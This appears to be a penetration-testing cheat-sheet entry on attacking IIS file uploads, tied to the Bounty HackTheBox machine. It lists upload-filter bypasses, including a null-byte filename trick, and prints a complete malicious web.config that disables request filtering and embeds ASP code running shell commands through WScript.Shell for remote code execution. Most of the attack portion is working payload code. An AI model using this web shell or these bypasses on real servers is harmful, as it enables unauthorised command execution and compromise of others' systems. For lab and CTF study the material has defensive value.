IIS Server File Upload
Developers can make directory-specific configurations or IIS servers using a web.config
file.
staticContent mimeMap fileExtension=".json" mimeType="application/json" /staticContent
Web Config file
A web.config file lets you customize the way your site or a specific directory on your site behaves. For example, if you place a web.config
file in your root directory, it will affect your entire site. If you place it in a /content directory, it will only affect that directory.
With a web.config file, you can control:
Database connection strings.
Error behavior.
Security.
web.config files are XML documents.
.config
is not an extension like.html
or.txt
Checklists
Try uploading a file with .aspx or .asp extension
If it doesn't work then tamper the extensions using .jpeg or .png
Then try to insert a %00 (NULL byte) =>
shell.aspx%00.jpeg
Bounty HTB IIS File Upload
We could insert our aspx code in the end of our .config
file.
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
<appSettings>
</appSettings>
</configuration>
// Our Actual aspx code starts from here
<!–-
<% Response.write("-"&"->")
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("whoami") // Executes shell commands
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write("</pre><!-"&"-") %>
-->
This is an another way to trigger our exploit and get a RCE
Last updated